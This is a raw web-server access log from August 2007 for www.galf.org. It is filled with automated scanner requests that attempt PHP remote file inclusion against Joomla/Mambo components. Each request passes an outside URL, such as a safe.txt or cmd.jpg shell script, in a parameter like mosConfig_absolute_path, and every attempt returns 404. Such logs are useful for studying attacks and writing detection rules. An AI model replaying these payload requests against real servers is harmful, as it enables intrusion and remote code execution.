66.7.200.148 - - [12/Aug/2007:22:58:40 -0700] "GET /logs/access_070730.log/index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.7.200.148 - - [12/Aug/2007:22:58:41 -0700] "GET /index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.7.200.148 - - [12/Aug/2007:22:58:41 -0700] "GET /logs/index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.7.200.148 - - [12/Aug/2007:22:58:42 -0700] "GET /logs/access.log/index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.241.213.59 - - [12/Aug/2007:22:59:33 -0700] "GET /logs/index.php?go=http://www.lhov.nl/images/ze/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.59 - - [12/Aug/2007:22:59:33 -0700] "GET /index.php?go=http://www.lhov.nl/images/ze/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.60.115.20 - - [12/Aug/2007:23:01:42 -0700] "GET /logs/index.php?id=http://www.sdar993.com/ijoo/cmd.do? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.60.115.20 - - [12/Aug/2007:23:01:42 -0700] "GET /index.php?id=http://www.sdar993.com/ijoo/cmd.do? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
64.34.170.230 - - [12/Aug/2007:23:04:57 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://servinweb.com/sohoadmin/program/myStrings.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
64.34.170.230 - - [12/Aug/2007:23:04:57 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://servinweb.com/sohoadmin/program/myStrings.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
86.109.103.5 - - [12/Aug/2007:23:07:06 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
86.109.103.5 - - [12/Aug/2007:23:07:06 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.7.200.148 - - [12/Aug/2007:23:08:12 -0700] "GET /logs/index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.7.200.148 - - [12/Aug/2007:23:08:12 -0700] "GET /index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.6.26.75 - - [12/Aug/2007:23:08:20 -0700] "GET /logs/access_070806.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
66.7.200.148 - - [12/Aug/2007:23:09:17 -0700] "GET /logs/access_070730.log/index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.7.200.148 - - [12/Aug/2007:23:09:18 -0700] "GET /logs/access.log/index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.193.232.6 - - [12/Aug/2007:23:12:14 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://send10.webspacemania.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.193.232.6 - - [12/Aug/2007:23:12:15 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://send10.webspacemania.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
86.109.103.5 - - [12/Aug/2007:23:14:47 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
86.109.103.5 - - [12/Aug/2007:23:14:48 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
65.55.208.232 - - [12/Aug/2007:23:15:47 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.208.232 - - [12/Aug/2007:23:15:47 -0700] "GET /?S=A HTTP/1.0" 200 1032 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
64.34.170.230 - - [12/Aug/2007:23:17:54 -0700] "GET /logs/index.php?go=http://servinweb.com/sohoadmin/program/myStrings.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.34.170.230 - - [12/Aug/2007:23:17:55 -0700] "GET /index.php?go=http://servinweb.com/sohoadmin/program/myStrings.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
204.157.7.145 - - [12/Aug/2007:23:18:31 -0700] "GET /logs/index2.php?url_page=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.157.7.145 - - [12/Aug/2007:23:18:31 -0700] "GET /index2.php?url_page=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.22.90.110 - - [12/Aug/2007:23:19:15 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.22.90.110 - - [12/Aug/2007:23:19:15 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.7.200.148 - - [12/Aug/2007:23:19:58 -0700] "GET /logs/access_070730.log/index.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.7.200.148 - - [12/Aug/2007:23:19:58 -0700] "GET /index.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.7.200.148 - - [12/Aug/2007:23:19:59 -0700] "GET /logs/index.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.7.200.148 - - [12/Aug/2007:23:19:59 -0700] "GET /logs/access.log/index.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.38.180.6 - - [12/Aug/2007:23:20:44 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.38.180.6 - - [12/Aug/2007:23:20:44 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.6.18.44 - - [12/Aug/2007:23:21:36 -0700] "GET /logs/access.log HTTP/1.0" 200 106730 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
58.29.43.67 - - [12/Aug/2007:23:22:50 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.29.43.67 - - [12/Aug/2007:23:22:51 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
64.34.170.230 - - [12/Aug/2007:23:22:51 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://servinweb.com/sohoadmin/program/myStrings.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.34.170.230 - - [12/Aug/2007:23:22:51 -0700] "GET /index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://servinweb.com/sohoadmin/program/myStrings.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
58.29.43.67 - - [12/Aug/2007:23:23:04 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.29.43.67 - - [12/Aug/2007:23:23:04 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
58.29.43.67 - - [12/Aug/2007:23:23:44 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.29.43.67 - - [12/Aug/2007:23:23:45 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
209.216.213.227 - - [12/Aug/2007:23:23:58 -0700] "GET /modules/xfsection/modify.php?dir_module=http://www.tarcisiobr.kit.net/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.193.232.6 - - [12/Aug/2007:23:25:10 -0700] "GET /logs/modules/xfsection/modify.php?dir_module=http://send10.webspacemania.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.193.232.6 - - [12/Aug/2007:23:25:10 -0700] "GET /modules/xfsection/modify.php?dir_module=http://send10.webspacemania.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.34.170.230 - - [12/Aug/2007:23:25:14 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://servinweb.com/sohoadmin/program/myStrings.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.34.170.230 - - [12/Aug/2007:23:25:14 -0700] "GET /index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://servinweb.com/sohoadmin/program/myStrings.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.106.139.78 - - [12/Aug/2007:23:25:44 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://tox1n3.nm.ru/tool/57?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.106.139.78 - - [12/Aug/2007:23:25:45 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=ftp://194.203.91.4/linux/mdk/smile05.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.106.139.78 - - [12/Aug/2007:23:25:45 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://tox1n3.nm.ru/tool/57?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.106.139.78 - - [12/Aug/2007:23:25:45 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=ftp://194.203.91.4/linux/mdk/smile05.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.34.170.230 - - [12/Aug/2007:23:26:14 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://servinweb.com/sohoadmin/program/myStrings.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.34.170.230 - - [12/Aug/2007:23:26:19 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://servinweb.com/sohoadmin/program/myStrings.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.34.170.230 - - [12/Aug/2007:23:26:21 -0700] "GET /logs/access.log/index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://servinweb.com/sohoadmin/program/myStrings.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.34.170.230 - - [12/Aug/2007:23:26:21 -0700] "GET /index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://servinweb.com/sohoadmin/program/myStrings.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.34.170.230 - - [12/Aug/2007:23:26:22 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://servinweb.com/sohoadmin/program/myStrings.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.230.14.151 - - [12/Aug/2007:23:28:39 -0700] "GET /logs/access_070730.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.rvo-beleggingen.nl/x7.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.14.151 - - [12/Aug/2007:23:28:39 -0700] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.rvo-beleggingen.nl/x7.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.14.151 - - [12/Aug/2007:23:28:39 -0700] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.rvo-beleggingen.nl/x7.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
64.34.170.230 - - [12/Aug/2007:23:30:39 -0700] "GET /logs/access_070723.log/index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://servinweb.com/sohoadmin/program/myStrings.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.34.170.230 - - [12/Aug/2007:23:30:39 -0700] "GET /index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://servinweb.com/sohoadmin/program/myStrings.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.34.170.230 - - [12/Aug/2007:23:30:40 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://servinweb.com/sohoadmin/program/myStrings.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.34.170.230 - - [12/Aug/2007:23:30:40 -0700] "GET /logs/access_070730.log/index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://servinweb.com/sohoadmin/program/myStrings.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
64.34.170.230 - - [12/Aug/2007:23:32:51 -0700] "GET /logs/access.log/index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://servinweb.com/sohoadmin/program/myStrings.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.34.170.230 - - [12/Aug/2007:23:32:51 -0700] "GET /index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://servinweb.com/sohoadmin/program/myStrings.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.34.170.230 - - [12/Aug/2007:23:32:51 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://servinweb.com/sohoadmin/program/myStrings.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.34.170.230 - - [12/Aug/2007:23:34:13 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://servinweb.com/sohoadmin/program/myStrings.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.34.170.230 - - [12/Aug/2007:23:34:42 -0700] "GET /logs/access.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://servinweb.com/sohoadmin/program/myStrings.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.34.170.230 - - [12/Aug/2007:23:34:42 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://servinweb.com/sohoadmin/program/myStrings.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.34.170.230 - - [12/Aug/2007:23:34:43 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://servinweb.com/sohoadmin/program/myStrings.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
58.29.43.67 - - [12/Aug/2007:23:35:08 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.29.43.67 - - [12/Aug/2007:23:35:08 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
64.34.170.230 - - [12/Aug/2007:23:35:40 -0700] "GET /logs/access_070723.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://servinweb.com/sohoadmin/program/myStrings.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.34.170.230 - - [12/Aug/2007:23:36:39 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://servinweb.com/sohoadmin/program/myStrings.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.34.170.230 - - [12/Aug/2007:23:36:39 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://servinweb.com/sohoadmin/program/myStrings.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.90.179.94 - - [12/Aug/2007:23:37:11 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/cmd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
200.90.179.94 - - [12/Aug/2007:23:37:11 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/cmd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
64.34.170.230 - - [12/Aug/2007:23:39:00 -0700] "GET /logs/access_070723.log/index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://servinweb.com/sohoadmin/program/myStrings.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.34.170.230 - - [12/Aug/2007:23:39:00 -0700] "GET /logs/access_070730.log/index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://servinweb.com/sohoadmin/program/myStrings.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.106.139.78 - - [12/Aug/2007:23:41:10 -0700] "GET /logs/index.php?go=http://tox1n3.nm.ru/tool/57?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.106.139.78 - - [12/Aug/2007:23:41:10 -0700] "GET /logs/index.php?go=ftp://194.203.91.4/linux/mdk/smile05.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.106.139.78 - - [12/Aug/2007:23:41:11 -0700] "GET /index.php?go=http://tox1n3.nm.ru/tool/57?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.106.139.78 - - [12/Aug/2007:23:41:11 -0700] "GET /index.php?go=ftp://194.203.91.4/linux/mdk/smile05.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.34.170.230 - - [12/Aug/2007:23:41:26 -0700] "GET /logs/access.log/index3.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://servinweb.com/sohoadmin/program/myStrings.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.34.170.230 - - [12/Aug/2007:23:41:27 -0700] "GET /index3.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://servinweb.com/sohoadmin/program/myStrings.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
64.34.170.230 - - [12/Aug/2007:23:41:27 -0700] "GET /logs/index3.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://servinweb.com/sohoadmin/program/myStrings.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.34.170.230 - - [12/Aug/2007:23:42:08 -0700] "GET /logs/access.log/index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://servinweb.com/sohoadmin/program/myStrings.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.34.170.230 - - [12/Aug/2007:23:42:08 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://servinweb.com/sohoadmin/program/myStrings.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.34.170.230 - - [12/Aug/2007:23:42:08 -0700] "GET /index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://servinweb.com/sohoadmin/program/myStrings.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.34.170.230 - - [12/Aug/2007:23:42:08 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://servinweb.com/sohoadmin/program/myStrings.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.34.170.230 - - [12/Aug/2007:23:42:08 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://servinweb.com/sohoadmin/program/myStrings.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.34.170.230 - - [12/Aug/2007:23:42:09 -0700] "GET /logs/access_070730.log/index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://servinweb.com/sohoadmin/program/myStrings.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
64.34.170.230 - - [12/Aug/2007:23:43:37 -0700] "GET /logs/access.log/index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://servinweb.com/sohoadmin/program/myStrings.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.34.170.230 - - [12/Aug/2007:23:43:37 -0700] "GET /index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://servinweb.com/sohoadmin/program/myStrings.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.34.170.230 - - [12/Aug/2007:23:43:38 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://servinweb.com/sohoadmin/program/myStrings.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.34.170.230 - - [12/Aug/2007:23:46:52 -0700] "GET /logs/access.log/index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://servinweb.com/sohoadmin/program/myStrings.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.34.170.230 - - [12/Aug/2007:23:46:52 -0700] "GET /index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://servinweb.com/sohoadmin/program/myStrings.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.34.170.230 - - [12/Aug/2007:23:46:52 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://servinweb.com/sohoadmin/program/myStrings.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.7.200.148 - - [12/Aug/2007:23:50:08 -0700] "GET /logs/access_070730.log/index.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.7.200.148 - - [12/Aug/2007:23:50:10 -0700] "GET /index.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.7.200.148 - - [12/Aug/2007:23:50:12 -0700] "GET /logs/index.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.7.200.148 - - [12/Aug/2007:23:50:17 -0700] "GET /logs/access.log/index.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
87.106.139.78 - - [12/Aug/2007:23:52:32 -0700] "GET /logs/index.php?p=http://tox1n3.nm.ru/tool/57?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.106.139.78 - - [12/Aug/2007:23:52:32 -0700] "GET /logs/index.php?p=ftp://194.203.91.4/linux/mdk/smile05.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.106.139.78 - - [12/Aug/2007:23:52:33 -0700] "GET /index.php?p=http://tox1n3.nm.ru/tool/57?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.106.139.78 - - [12/Aug/2007:23:52:33 -0700] "GET /index.php?p=ftp://194.203.91.4/linux/mdk/smile05.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.106.139.78 - - [12/Aug/2007:23:58:51 -0700] "GET /logs/index.php?p=http://tox1n3.nm.ru/tool/57?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
87.106.139.78 - - [12/Aug/2007:23:58:51 -0700] "GET /logs/index.php?p=ftp://194.203.91.4/linux/mdk/smile05.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.106.139.78 - - [12/Aug/2007:23:58:51 -0700] "GET /index.php?p=http://tox1n3.nm.ru/tool/57?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.106.139.78 - - [12/Aug/2007:23:58:52 -0700] "GET /index.php?p=ftp://194.203.91.4/linux/mdk/smile05.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
207.210.102.125 - - [12/Aug/2007:23:59:30 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
83.15.139.164 - - [13/Aug/2007:00:00:39 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
83.15.139.164 - - [13/Aug/2007:00:00:39 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
89.111.173.45 - - [13/Aug/2007:00:01:27 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/cmd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
